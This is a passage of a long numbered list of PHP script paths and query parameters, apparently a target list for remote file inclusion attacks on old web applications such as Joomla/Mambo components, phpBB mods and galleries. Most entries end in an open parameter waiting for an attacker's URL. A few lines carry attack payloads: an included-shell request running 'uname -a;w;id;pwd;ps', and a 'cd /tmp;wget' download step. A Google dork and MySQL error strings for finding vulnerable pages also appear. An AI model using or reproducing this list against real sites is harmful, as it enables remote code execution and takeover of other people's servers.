  1817. base.php?loc=
  1818. index.php?option=
  1819. layout.php?abre=
  1820. base.php?pa=
  1821. enter.php?module=
  1822. head.php?play=
  1823. index3.php?read=
  1824. nota.php?left=
  1825. padrao.php?mid=
  1826. padrao.php?strona=
  1827. padrao.php?n=
  1828. gallery.php?pref=
  1829. pagina.php?goto=
  1830. default.php?menue=
  1831. blank.php?sivu=
  1832. layout.php?pageweb=
  1833. pagina.php?loc=
  1834. layout.php?qry=
  1835. padrao.php?nivel=
  1836. default.php?index=
  1837. gallery.php?redirect=
  1838. file.php?start=
  1839. layout.php?opcion=
  1840. page.php?ev=
  1841. head.php?index=
  1842. principal.php?rub=
  1843. down*.php?pollname=
  1844. gallery.php?y=
  1845. gallery.php?page=
  1846. index3.php?second=
  1847. standard.php?numero=
  1848. view.php?pr=
  1849. press.php?include=
  1850. index1.php?OpenPage=
  1851. file.php?body=
  1852. principal.php?load=
  1853. base.php?eval=
  1854. blank.php?pa=
  1855. start.php?o=
  1856. index3.php?pre=
  1857. enter.php?second=
  1858. sub*.php?pname=
  1859. gallery.php?open=
  1860. sub*.php?ir=
  1861. print.php?g=
  1862. general.php?pageweb=
  1863. page.php?pref=
  1864. nota.php?home=
  1865. index2.php?recipe=
  1866. blank.php?lang=
  1867. path.php?thispage=
  1868. view.php?panel=
  1869. mod*.php?ir=
  1870. head.php?incl=
  1871. down*.php?choix=
  1872. index1.php?load=
  1873. gallery.php?menu=
  1874. view.php?mod=
  1875. index3.php?nivel=
  1876. padrao.php?eval=
  1877. view.php?goto=
  1878. sub*.php?k=
  1879. components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
  1880. components/com_forum/download.php?phpbb_root_path=
  1881. inc/functions.inc.php?config[ppa_root_path]=
  1882. index.php?menu=deti&page=
  1883. SQuery/lib/gore.php?libpath=
  1884. /include/db.php?GLOBALS[rootdp]=
  1885. (www.google.com => intitle:PHPOpenChat exthp)
  1886. /calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
  1887. /calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
  1888. /inc/header.php/step_one.php?server_inc=
  1889. /zboard/zboard.php
  1890. /path_of_cpcommerce/_functions.php?prefix
  1891. /dotproject/modules/tasks/addedit.php?root_dir=
  1892. /My_eGallery/public/displayCategory.php?basepath=
  1893. /index.php?include= | /index.php?inc= | /index.php?page= | /index.php?pag= | /index.php?p=
  1894. /index.php?x= | /index.php?open= | /index.php?open= | /index.php?visualizar= | /index.php?pagina=
  1895. /index.php?content= | /index.php?cont= | /index.php?c= | /index.php?meio= | /index.php?x=
  1896. /index.php?cat= | /index.php?site= /index.php?configFile= | /index.php?action= | /index.php?do=
  1897. /index2.php?x= | /index2.php?content= | /template.php?pagina= | /inc/step_one_tables.php?server_inc=
  1898. /GradeMap/index.php?page= | /phpshop/index.php?base_dir= | /admin.php?cal_dir=
  1899. /path_of_cpcommerce/_functions.php?prefix= | /contacts.php?cal_dir= | /convert-date.php?cal_dir=
  1900. /dotproject/modules/files/index_table.php?root_dir=
  1901. /html/affich.php?base=
  1902. include/common.php?include_path=
  1903. event/index.php?page=
  1904. forums/index.php?includeFooter=
  1905. forum/bb_admin.php?includeFooter=
  1906. language/lang_english/lang_activity.php?phpbb_root_path=
  1907. forum/language/lang_english/lang_activity.php?phpbb_root_path=
  1908. blend_data/blend_common.php?phpbb_root_path=
  1909. master.php?root_path=
  1910. forum/includes/kb_constants.php?module_root_path=
  1911. agenda2.php3?rootagenda=
  1912. sources/lostpw.php?CONFIG[path]=
  1913. toplist/sources/lostpw.php?CONFIG[path]=
  1914. sources/join.php?CONFIG[path]=
  1915. toplist/sources/join.php?CONFIG[path]=
  1916. public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=
  1917. index.php?site_path=
  1918. modules/TotalCalendar/index.php?inc_dir=
  1919. calendar/embed/day.php?path=
  1920. claroline/auth/ldap/authldap.php?includePath=
  1921. config.php?returnpath=
  1922. addsite.php?returnpath=
  1923. apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=
  1924. infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=
  1925. phpdig/includes/config.php?relative_script_path=
  1926. includes/phpdig/includes/config.php?relative_script_path=
  1927. includes/dbal.php?eqdkp_root_path=
  1928. eqdkp/includes/dbal.php?eqdkp_root_path=
  1929. manager/frontinc/prepend.php?_PX_config[manager_path]=
  1930. includes/orderSuccess.inc.php?glob[rootDir]=
  1931. stats.php?dir[func]=dir[base]=
  1932. ladder/stats.php?dir[base]=
  1933. admin/configset.php?settings_dir=
  1934. modules/vWar_Account/includes/get_header.php?vwar_root=
  1935. modules/vWar_Account/includes/functions_common.php?vwar_root2=
  1936. sphider/admin/configset.php?settings_dir=
  1937. application.php?base_path=
  1938. add.php?theme_path=
  1939. bad_link.php?theme_path=
  1940. browse.php?theme_path=
  1941. new.php?theme_path=
  1942. pick.php?theme_path=
  1943. rating.php?theme_path=
  1944. register.php?theme_path=
  1945. rss.php?theme_path=
  1946. search.php?theme_path=
  1947. send_pwd.php?theme_path=
  1948. sendmail.php?theme_path=
  1949. tell_friend.php?theme_path=
  1950. top_rated.php?theme_path=
  1951. user_detail.php?theme_path=
  1952. user_search.php?theme_path=
  1953. invoice.php?base_path=
  1954. cgi-bin//classes/adodbt/sql.php?classes_dir=
  1955. cgi-bin/install/index.php?G_PATH=
  1956. bazar/classified_right.php?language_dir=
  1957. chat/messagesL.php3?cmd=
  1958. bbs/include/write.php?dir=
  1959. modules/center/admin/accounts/process.php?module_path]=
  1960. armygame.php?libpath=
  1961. lire.php?rub=
  1962. pathofhostadmin/?page=
  1963. apa_phpinclude.inc.php?apa_module_basedir=
  1964. research/boards/encapsbb-0.3.2_fixed/index_header.php?root=
  1965. index.php?archive=
  1966. forum/include/common.php?pun_root=
  1967. cgi-bin//include/write.php?dir=
  1968. pm/lib.inc.php?sfx=
  1969. osticket/include/main.php?include_dir=
  1970. zboard/include/write.php?dir=
  1971. PATH/admin/plog-admin-functions.php?configbasedir=
  1972. path_to_phpgreetz/content.php?content=
  1973. path_to_qnews/q-news.php?id=
  1974. include/db.php?GLOBALS[rootdp]=
  1975. protection.php?siteurl=
  1976. classes.php?LOCAL_PATH=
  1977. admin/objects.inc.php4?Server=
  1978. block.php?Include=
  1979. arpuivo.php?data=
  1980. path_to_gallery/setup/index.php?GALLERY_BASEDIR=
  1981. include/help.php?base=
  1982. index.php?[Home]=
  1983. PHPNews/auth.php?path=
  1984. include/print_category.php?dir=
  1985. skin/zero_vote/login.php?dir=
  1986. skin/zero_vote/ask_password.php?dir=
  1987. gui/include/sql.php?include_path=
  1988. webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=
  1989. index.php?custom=
  1990. skin/zero_vote/setup.php?dir=
  1991. admin_modules/admin_module_edit.inc.php?config[path_src_include]=
  1992. admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
  1993. src/index_leftnavbar.inc.php?config[path_src_include]=
  1994. src/index_image.inc.php?config[path_src_include]=
  1995. src/main.inc.php?config[path_src_include]=
  1996. src/index_passwd-admin.inc.php?config[path_admin_include]=
  1997. admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
  1998. src/index_overview.inc.php?config[path_src_include]=
  1999. src/image.class.php?config[image_module]=
  2000. src/album.class.php?config[path_src_include]=
  2001. includes/db_adodb.php?baseDir=
  2002. includes/db_connect.php?baseDir=
  2003. includes/session.php?baseDir=
  2004. modules/projects/gantt.php?dPconfig[root_dir]=
  2005. modules/projects/gantt2.php?dPconfig[root_dir]=
  2006. modules/projects/vw_files.php?dPconfig[root_dir]=
  2007. modules/admin/vw_usr_roles.php?baseDir=
  2008. modules/public/calendar.php?baseDir=
  2009. modules/public/date_format.php?baseDir=
  2010. modules/tasks/gantt.php?baseDir=
  2011. mantis/login_page.php?g_meta_include_file=
  2012. phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=
  2013. modules/My_eGallery/public/displayCategory.php?basepath=
  2014. dotproject/modules/files/index_table.php?root_dir=
  2015. nukebrowser.php?filnavn=
  2016. bug_sponsorship_list_view_inc.php?t_core_path=
  2017. modules/coppermine/themes/maze/theme.php?THEME_DIR=
  2018. includes/setup.php?phpc_root_path=
  2019. phpBB/admin/admin_styles.php?mode=
  2020. aMember/plugins/db/mysql/mysql.inc.php?config=
  2021. admin/lang.php?CMS_ADMIN_PAGE=
  2022. modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
  2023. modules/mod_mainmenu.php?mosConfig_absolute_path=
  2024. modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
  2025. modules/newbb_plus/class/forumpollrenderer.php?bbPath=
  2026. journal.php?m=
  2027. index.php?m=
  2028. links.php?c=
  2029. forums.php?m=
  2030. list.php?c=
  2031. user.php?xoops_redirect=
  2032. r.php?url=
  2033. CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=
  2034. inc/formmail.inc.php?script_root=
  2035. include/init.inc.php?G_PATH=
  2036. backend/addons/links/index.php?PATH=
  2037. modules/newbb_plus/class/class.forumposts.php?bbPath[path]=
  2038. mail_autocheck.php?pm_path=
  2039. community/modules/agendax/addevent.inc.php?agendax_path=
  2040. index.php/main.php?x=
  2041. includes/include_onde.php?include_file=
  2042. print.php?val1=
  2043. cmd.php?function=
  2044. iframe.php?file=
  2045. os/pointer.php?url=
  2046. p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=
  2047. phpGedView/individual.php?PGV_BASE_DIRECTORY=
  2048. index.php?kietu[url_hit]=
  2049. phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
  2050. Sources/Packages.php?sourcedir=
  2051. modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
  2052. cgi-bin//gadgets/Blog/BlogModel.php?path=
  2053. cgi-bin//admin.php?cal_dir=
  2054. gallery/captionator.php?GALLERY_BASEDIR=
  2055. cgi-bin/main.php?x=
  2056. Blog/BlogModel.php?path=
  2057. expanded.php?conf=
  2058. pollvote/pollvote.php?pollname=
  2059. phpBB2/admin/admin_cash.php?phpbb_root_path=
  2060. modules/foro/includes/functions_admin.php?phpbb_root_path=
  2061. modules/Forums/admin/admin_forums.php?phpEx=
  2062. modules/Forums/admin/admin_disallow.php?phpEx=
  2063. modules/Forums/admin/admin_smilies.php?phpEx=
  2064. modules/Forums/admin/admin_board.php?phpEx=
  2065. modules/Forums/admin/admin_users.php?phpEx=
  2066. modules/Forums/admin/admin_mass_email.php?phpEx=
  2067. modules/Forums/admin/admin_forum_prune.php?phpEx=
  2068. modules/Forums/admin/admin_styles.php?phpbb_root_path=
  2069. index.php?hc=
  2070. mt-comments.cgi?id=
  2071. webcalendar/tools/send_reminders.php?includedir=
  2072. cmd/product_info.php/products_id/1622/shop_content.php?coID=
  2073. addevent.inc.php?agendax_path=
  2074. step_one.php?server_inc=
  2075. upgrade_album.php?GALLERY_BASEDIR=
  2076. modules.php?name=
  2077. wagora/extras//quicklist.php?site=
  2078. vCard/admin/define.inc.php?match=
  2079. forum/ubbthreads.php?Cat=
  2080. admin/includes/classes/spaw/spaw_control.class.php?spaw_root=
  2081. secure.php?cfgProgDir=
  2082. modules/My_eGallery/public//inc/?HCL_path=
  2083. modules/My_eGallery/public/imagen.php?basepath=
  2084. adlayer.php?layerstyle=
  2085. Forums/bb_smilies.php?name=
  2086. modules/Forums/bb_smilies.php?name=
  2087. gadgets/Blog/BlogModel.php?path=
  2088. learnlinc/clmcpreload.php?CLPATH=
  2089. modernbill/samples/news.php?DIR=
  2090. religions/faq.php?page=
  2091. forum/viewtopic.php?t=
  2092. announcements.php?includePath=
  2093. phpatm/index.php?include_location=
  2094. gb/form.inc.php3?lang=
  2095. shannen/index.php?x=
  2096. family/phpgedview/index.php?PGV_BASE_DIRECTORY=
  2097. main.php?left=
  2098. forum/misc.php?action=
  2099. nucleus/libs/globalfunctions.php?DIR_LIBS=
  2100. show_archives.php?cutepath=
  2101. gallery.php=
  2102. magicforum/misc.php?action=
  2103. forum/admin/actions/del.php?include_path=
  2104. local/investing_industrialeastate1.php?a=
  2105. modules/coppermine/themes/default/theme.php?THEME_DIR
  2106. Popper/index.php?childwindow.inc.php?form=
  2107. class.mysql.php?path_to_bt_dir=
  2108. include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  2109. eyeos/desktop.php?baccio=
  2110. ashnews.php?pathtoashnews=
  2111. index.php?modpath=
  2112. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
  2113. Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
  2114. index.php?sqld=
  2115. inc/step_one_tables.php?server_inc=
  2116. phpprojekt/lib/authform.inc.php?path_pre=
  2117. include/oci8.php?inc_dir=
  2118. include/postgres65.php?inc_dir=
  2119. phorum/admin/actions/del.php?include_path=
  2120. userlist.php?ME=.example.com
  2121. ashnews.php?pathtoashnews=cd /tmp;wget
  2122. includes/include_once.php?include_file=
  2123. gnu/index.php?doc=
  2124. includes/calendar.php?phpc_root_path=
  2125. web_statistics//skin/zero_vote/error.php?dir=
  2126. nphp/nphpd.php?nphp_config[LangFile]=
  2127. poll/admin/common.inc.php?base_path=
  2128. sources/post.php?fil_config=
  2129. coppermine/themes/maze/theme.php?THEME_DIR=
  2130. calendar/calendar.php?serverPath=
  2131. calendar/functions/popup.php?serverPath=
  2132. calendar/setup/header.inc.php?serverPath=
  2133. dotproject/modules/projects/view.php?root_dir=
  2134. My_eGallery/public/displayCategory.php?basepath=
  2135. html/affich.php?base=
  2136. ideabox/include.php?gorumDir=
  2137. pollvote/pollvote.php?pollname
  2138. includes/page_header.php?dir=
  2139. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
  2140. /login.php?dir=
  2141. index.php?nic=
  2142. main.php?site=
  2143. index.php?Load=
  2144. interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=
  2145. index.php?kobr=
  2146. index.php?dept=
  2147. index.php?lg=
  2148. template.php?name=
  2149. services.php?page=
  2150. show.php?page=
  2151. /bz/squito/photolist.inc.php?photoroot=
  2152. /components/com_cpg/cpg.php?mosConfig_absolute_path=
  2153. gallery.php?seite=
  2154. template.php?h=
  2155. layout.php?pagina=
  2156. default.php?name=
  2157. standard.php?url=
  2158. main.php?doshow=
  2159. index.php?to=
  2160. template.php?texto=
  2161. print.php?chapter=
  2162. index1.php?dir=
  2163. home.php?category=
  2164. start.php?seccion=
  2165. view.php?choix=
  2166. path.php?menue=
  2167. gallery.php?seccion=
  2168. pagina.php?u=
  2169. home.php?recipe=
  2170. print.php?open=
  2171. *inc*.php?include=
  2172. path.php?pre=
  2173. include.php?sivu=
  2174. sitio.php?texto=
  2175. padrao.php?loc=
  2176. template.php?pre=
  2177. sitio.php?doshow=
  2178. pagina.php?go=
  2179. default.php?var=
  2180. press.php?itemnav=
  2181. mod*.php?chapter=
  2182. enter.php?pref=
  2183. index2.php?type=
  2184. base.php?link=
  2185. info.php?texto=
  2186. standard.php?dir=
  2187. layout.php?page=
  2188. gallery.php?addr=
  2189. file.php?play=
  2190. nota.php?v=
  2191. path.php?goto=
  2192. padrao.php?name=
  2193. pagina.php?nivel=
  2194. file.php?strona=
  2195. main.php?chapter=
  2196. layout.php?incl=
  2197. head.php?ev=
  2198. main.php?j=
  2199. down*.php?ev=
  2200. index2.php?ki=
  2201. blank.php?panel=
  2202. default.php?ir=
  2203. default.php?sp=
  2204. template.php?dir=
  2205. start.php?cmd=
  2206. show.php?pre=
  2207. padrao.php?d=
  2208. print.php?strona=
  2209. sitio.php?recipe=
  2210. principal.php?read=
  2211. home.php?secao=
  2212. blank.php?mod=
  2213. enter.php?y=
  2214. index.php?pname=
  2215. enter.php?ir=
  2216. home.php?oldal=
  2217. nota.php?seccion=
  2218. show.php?modo=
  2219. enter.php?phpbb_root_path=
  2220. start.php?basepath=
  2221. index1.php?my=
  2222. enter.php?cmd=
  2223. info.php?xlink=
  2224. home.php?path=
  2225. main.php?ref=
  2226. layout.php?cont=
  2227. index1.php?v=
  2228. blank.php?incl=
  2229. sub*.php?load=
  2230. gallery.php?sp=
  2231. sub*.php?b=
  2232. print.php?goto=
  2233. padrao.php?base_dir=
  2234. path.php?incl=
  2235. index2.php?my=
  2236. info.php?c=
  2237. include.php?w=
  2238. main.php?section=
  2239. gallery.php?basepath=
  2240. layout.php?menue=
  2241. template.php?mid=
  2242. mod*.php?qry=
  2243. press.php?page=
  2244. default.php?strona=
  2245. gallery.php?index=
  2246. page.php?oldal=
  2247. sitio.php?menu=
  2248. principal.php?id=
  2249. sitio.php?r=
  2250. template.php?base_dir=
  2251. general.php?pre=
  2252. standard.php?pre=
  2253. sub*.php?modo=
  2254. print.php?pollname=
  2255. template.php?f=
  2256. index2.php?second=
  2257. print.php?ki=
  2258. padrao.php?a=
  2259. sub*.php?op=
  2260. padrao.php?body=
  2261. gallery.php?secao=
  2262. pagina.php?lang=
  2263. gallery.php?go=
  2264. press.php?lang=
  2265. press.php?t=
  2266. path.php?recipe=
  2267. enter.php?menue=
  2268. pagina.php?z=
  2269. default.php?mid=
  2270. blank.php?xlink=
  2271. press.php?OpenPage=
  2272. padrao.php?texto=
  2273. gallery.php?get=
  2274. press.php?destino=
  2275. print.php?base_dir=
  2276. file.php?get=
  2277. default.php?goto=
  2278. main.php?dir=
  2279. file.php?disp=
  2280. layout.php?url=
  2281. path.php?*[*]*=
  2282. standard.php?body=
  2283. base.php?module=
  2284. template.php?left=
  2285. index2.php?texto=
  2286. padrao.php?section=
  2287. blank.php?pollname=
  2288. sitio.php?incl=
  2289. standard.php?goFile=
  2290. index1.php?texto=
  2291. general.php?seccion=
  2292. print.php?pre=
  2293. gallery.php?left=
  2294. include.php?pag=
  2295. default.php?tipo=
  2296. include.php?destino=
  2297. standard.php?destino=
  2298. general.php?mid=
  2299. main.php?category=
  2300. main.php?content=
  2301. show.php?disp=
  2302. head.php?d=
  2303. *inc*.php?ki=
  2304. gallery.php?mid=
  2305. sub*.php?goFile=
  2306. down*.php?include=
  2307. press.php?type=
  2308. press.php?where=
  2309. page.php?qry=
  2310. default.php?pre=
  2311. sitio.php?name=
  2312. main.php?filepath=
  2313. general.php?to=
  2314. print.php?where=
  2315. down*.php?corpo=
  2316. gallery.php?var=
  2317. show.php?read=
  2318. gallery.php?h=
  2319. base.php?home=
  2320. padrao.php?url=
  2321. pagina.php?read=
  2322. gallery.php?name=
  2323. nota.php?filepath=
  2324. home.php?pre=
  2325. down*.php?pg=
  2326. default.php?t=
  2327. page.php?modo=
  2328. padrao.php?secao=
  2329. nota.php?sekce=
  2330. page.php?load=
  2331. general.php?body=
  2332. page.php?subject=
  2333. home.php?middle=
  2334. path.php?tipo=
  2335. home.php?doshow=
  2336. padrao.php?basepath=
  2337. blank.php?get=
  2338. page.php?pa=
  2339. nota.php?abre=
  2340. padrao.php?corpo=
  2341. sub*.php?j=
  2342. main.php?xlink=
  2343. include.php?dir=
  2344. press.php?pr=
  2345. index.php?pr=
  2346. principal.php?pollname=
  2347. nota.php?rub=
  2348. view.php?ir=
  2349. padrao.php?menue=
  2350. page.php?pname=
  2351. layout.php?pollname=
  2352. start.php?play=
  2353. template.php?choix=
  2354. info.php?*[*]*=
  2355. down*.php?v=
  2356. main.php?pre=
  2357. info.php?pname=
  2358. path.php?id=
  2359. padrao.php?sekce=
  2360. gallery.php?pg=
  2361. gallery.php?param=
  2362. include.php?include=
  2363. standard.php?action=
  2364. template.php?lang=
  2365. include.php?basepath=
  2366. file.php?load=
  2367. gallery.php?mod=
  2368. sub*.php?rub=
  2369. press.php?middle=
  2370. index3.php?loader=
  2371. index3.php?name=
  2372. gallery.php?my=
  2373. main.php?body=
  2374. head.php?ir=
  2375. start.php?go=
  2376. pagina.php?sekce=
  2377. file.php?n=
  2378. include.php?module=
  2379. gallery.php?filepath=
  2380. path.php?numero=
  2381. default.php?body=
  2382. blank.php?var=
  2383. blank.php?phpbb_root_path=
  2384. mod*.php?var=
  2385. press.php?ev=
  2386. index1.php?pollname=
  2387. pagina.php?filepath=
  2388. template.php?tipo=
  2389. page.php?g=
  2390. bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=
  2391. include/new-visitor
  2392. /components/com_hashcash/server.php?mosConfig_absolute_path=
  2393. /components/com_forum/download.php?phpbb_root_path=
  2394. /gallery/thumbnails.php?lang=
  2395. /forums/toplist.php?phpbb_root_path=
  2396. /forum/toplist.php?phpbb_root_path=
  2397. /admin/config_settings.tpl.php?include_path=
  2398. /forum/bb_admin.php?includeFooter=
  2399. /forum/language/lang_english/lang_activity.php?phpbb_root_path=
  2400. /blend_data/blend_common.php?phpbb_root_path=
  2401. /master.php?root_path=
  2402. /sources/lostpw.php?CONFIG[path]=
  2403. /sources/join.php?CONFIG[path]=
  2404. /public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=
  2405. /auction/auction_common.php?phpbb_root_path=
  2406. /calendar/index.php?inc_dir=
  2407. /modules/calendar/index.php?inc_dir=
  2408. /ACalendar/embed/day.php?path=
  2409. /modules/credits/help.php?lang=
  2410. /apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=
  2411. /infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=
  2412. /path/include/SQuery/gameSpy2.php?libpath=
  2413. /ubbthreads/addpost_newpoll.php?addpoll=thispath=
  2414. /forum/admin/addentry.php?phpbb_root_path=
  2415. /admin/configset.php?settings_dir=
  2416. /sphider/admin/configset.php?settings_dir=
  2417. /forums/impex/ImpExData.php?systempath=
  2418. /cgi-bin/include/print_category.php?dir=
  2419. /phpBazar/classified_right.php?language_dir=
  2420. /research/boards/encapsbb-0.3.2_fixed/index_header.php?root=
  2421. /Farsi1/index.php?archive=
  2422. /admin/common.inc.php?basepath=
  2423. /pm/lib.inc.php?sfx=
  2424. /include/main.php?config[search_disp]=include_dir=
  2425. /path_to_phpgreetz/content.php?content=
  2426. /path_to_qnews/q-news.php?id=
  2427. /votebox.php?VoteBoxPath=
  2428. /modules/news/archivednews.php?GLOBALS[language_home]=
  2429. /admin/objects.inc.php4?Server=
  2430. /trg_news30/trgnews/install/article.php?dir=
  2431. /examples/phonebook.php?page=
  2432. /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=
  2433. /PhotoGal/ops/gals.php?news_file=
  2434. /index.php?custom=
  2435. /xcomic/initialize.php?xcomicRootPath=
  2436. /admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
  2437. /admin_modules/admin_module_edit.inc.php?config[path_src_include]=
  2438. /src/index_leftnavbar.inc.php?config[path_src_include]=
  2439. /src/image.class.php?config[path_src_include]=
  2440. /modules/public/calendar.php?baseDir=
  2441. /mantis/login_page.php?g_meta_include_file=
  2442. /aMember/plugins/db/mysql/mysql.inc.php?config=
  2443. /inc/formmail.inc.php?script_root=
  2444. /backend/addons/links/index.php?PATH=
  2445. /p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=
  2446. /db.php?path_local=
  2447. /index.php?kietu[url_hit]=
  2448. /cgi-bin/main.php?x=
  2449. /modules/Forums/admin/admin_disallow.php?phpEx=
  2450. /modules/Forums/admin/admin_forum_prune.php?phpEx=
  2451. /addevent.inc.php?agendax_path=
  2452. /forum/ubbthreads.php?Cat=
  2453. /admin/includes/classes/spaw/spaw_control.class.php?spaw_root=
  2454. /modules/My_eGallery/public/imagen.php?basepath=
  2455. /gb/form.inc.php3?lang=
  2456. /family/phpgedview/index.php?PGV_BASE_DIRECTORY=
  2457. /eyeos/desktop.php?baccio=
  2458. /catalog/includes/include_once.php?include_file=
  2459. /zb41/include/write.php?dir=
  2460. /_head.php?_zb_path=.example.com
  2461. /include/msql.php?inc_dir=
  2462. /include/mssql7.php?inc_dir=
  2463. /include/oci8.php?inc_dir=
  2464. /b2-tools/gm-2-b2.php?b2inc=
  2465. /hcl/inc/pipe.php?HCL_path=
  2466. /web_statistics//include/write.php?dir=
  2467. /web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=
  2468. /web_statistics//calendar/tools/send_reminders.php?includedir=
  2469. /calendar/functions/popup.php?serverPath=
  2470. /calendar/setup/header.inc.php?serverPath=
  2471. /dotproject/modules/tasks/viewgantt.php?root_dir=
  2472. /new/bbs//include/write.php?dir=
  2473. /index.php?template=
  2474. /index.php?c=
  2475. /index.php?visualizar=
  2476. /index.php?pageurl=
  2477. /index.php?do=
  2478. /page.php?template=
  2479. /index.php?hc=
  2480. /fclick/show.php?path=
  2481. /new.php?theme_path=
  2482. /power_search.php?theme_path=
  2483. /search.php?theme_path=
  2484. /apa_phpinclude.inc.php?apa_module_basedir=
  2485. /print.php?val1=
  2486. /cmd.php?function=
  2487. /administrator/popups/contentwindow.php?mosConfig_absolute_path=
  2488. /administrator/index2.php?mosConfig_absolute_path=
  2489. /globals.php?mosConfig_absolute_path=
  2490. /administrator/components/com_banners/admin.banners.php?mosConfig_absolute_path=
  2491. /administrator/components/com_contact/toolbar.contact.php?mosConfig_absolute_path=
  2492. /administrator/components/com_frontpage/toolbar.frontpage.html.php?mosConfig_absolute_path=
  2493. /administrator/components/com_frontpage/toolbar.frontpage.php?mosConfig_absolute_path=
  2494. /administrator/components/com_languages/toolbar.languages.html.php?mosConfig_absolute_path=
  2495. /administrator/components/com_menus/admin.menus.php?mosConfig_absolute_path=
  2496. /administrator/components/com_menus/content_archive_category/content_archive_category.class.php?mosConfig_absolute_path=
  2497. /administrator/components/com_menus/content_archive_category/content_archive_category.menu.html.php?mosConfig_absolute_path=
  2498. /administrator/components/com_menus/content_archive_category/content_archive_category.menu.php?mosConfig_absolute_path=
  2499. /administrator/components/com_menus/content_archive_section/content_archive_section.class.php?mosConfig_absolute_path=
  2500. /administrator/components/com_menus/content_archive_section/content_archive_section.menu.html.php?mosConfig_absolute_path=
  2501. /administrator/components/com_menus/content_archive_section/content_archive_section.menu.php?mosConfig_absolute_path=
  2502. /administrator/components/com_menus/content_blog_category/content_blog_category.class.php?mosConfig_absolute_path=
  2503. /administrator/components/com_menus/content_blog_category/content_blog_category.menu.html.php?mosConfig_absolute_path=
  2504. /administrator/components/com_menus/content_blog_category/content_blog_category.menu.php?mosConfig_absolute_path=
  2505. /administrator/components/com_menus/content_blog_section/content_blog_section.class.php?mosConfig_absolute_path=
  2506. /administrator/components/com_menus/content_blog_section/content_blog_section.menu.html.php?mosConfig_absolute_path=
  2507. /administrator/components/com_menus/content_blog_section/content_blog_section.menu.php?mosConfig_absolute_path=
  2508. /administrator/components/com_menus/content_category/content_category.class.php?mosConfig_absolute_path=
  2509. /administrator/components/com_menus/content_category/content_category.menu.html.php?mosConfig_absolute_path=
  2510. /administrator/components/com_menus/content_category/content_category.menu.php?mosConfig_absolute_path=
  2511. /administrator/components/com_menus/content_section/content_section.menu.html.php?mosConfig_absolute_path=
  2512. /administrator/components/com_menus/content_typed/content_typed.class.php?mosConfig_absolute_path=
  2513. /administrator/components/com_menus/content_typed/content_typed.menu.html.php?mosConfig_absolute_path=
  2514. /administrator/components/com_menus/separator/separator.class.php?mosConfig_absolute_path=
  2515. /administrator/components/com_menus/separator/separator.menu.php?mosConfig_absolute_path=
  2516. /administrator/components/com_menus/url/url.class.php?mosConfig_absolute_path=
  2517. /administrator/components/com_menus/url/url.menu.html.php?mosConfig_absolute_path=
  2518. /administrator/components/com_messages/admin.messages.html.php?mosConfig_absolute_path=
  2519. /administrator/components/com_newsfeeds/toolbar.newsfeeds.html.php?mosConfig_absolute_path=
  2520. /administrator/components/com_poll/admin.poll.html.php?mosConfig_absolute_path=
  2521. /administrator/components/com_poll/admin.poll.php?mosConfig_absolute_path=
  2522. /administrator/components/com_templates/toolbar.templates.html.php?mosConfig_absolute_path=
  2523. /administrator/components/com_users/admin.users.html.php?mosConfig_absolute_path=
  2524. /administrator/components/com_users/toolbar.users.html.php?mosConfig_absolute_path=
  2525. /administrator/components/com_weblinks/toolbar.weblinks.html.php?mosConfig_absolute_path=
  2526. /administrator/components/com_weblinks/toolbar.weblinks.php?mosConfig_absolute_path=
  2527. /administrator/images/back.png?mosConfig_absolute_path=
  2528. /administrator/images/edit.png?mosConfig_absolute_path=
  2529. /administrator/images/edit_f2.png?mosConfig_absolute_path=
  2530. /administrator/images/help.png?mosConfig_absolute_path=
  2531. /administrator/images/move.png?mosConfig_absolute_path=
  2532. /administrator/images/new.png?mosConfig_absolute_path=
  2533. /administrator/images/preview_f2.png?mosConfig_absolute_path=
  2534. /administrator/images/publish_y.png?mosConfig_absolute_path=
  2535. /administrator/images/save.png?mosConfig_absolute_path=
  2536. /administrator/images/tick.png?mosConfig_absolute_path=
  2537. /administrator/images/unarchive_f2.png?mosConfig_absolute_path=
  2538. /administrator/images/unpublish_f2.png?mosConfig_absolute_path=
  2539. /administrator/includes/auth.php?mosConfig_absolute_path=
  2540. /components/com_frontpage/frontpage.class.php?mosConfig_absolute_path=
  2541. /components/com_login/login.html.php?mosConfig_absolute_path=
  2542. /components/com_newsfeeds/newsfeeds.php?mosConfig_absolute_path=
  2543. /components/com_poll/poll.php?mosConfig_absolute_path=
  2544. /components/com_registration/registration.html.php?mosConfig_absolute_path=
  2545. /components/com_search/search.html.php?mosConfig_absolute_path=
  2546. /components/com_search/search.php?mosConfig_absolute_path=
  2547. /editor/htmlarea3_xtd15/popups/InsertFile/main.php?mosConfig_absolute_path=
  2548. /includes/frontend.php?mosConfig_absolute_path=
  2549. /includes/pageNavigation.php?mosConfig_absolute_path=
  2550. /includes/pdf.php?mosConfig_absolute_path=
  2551. /modules/mod_newsflash.php?mosConfig_absolute_path=
  2552. /open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=
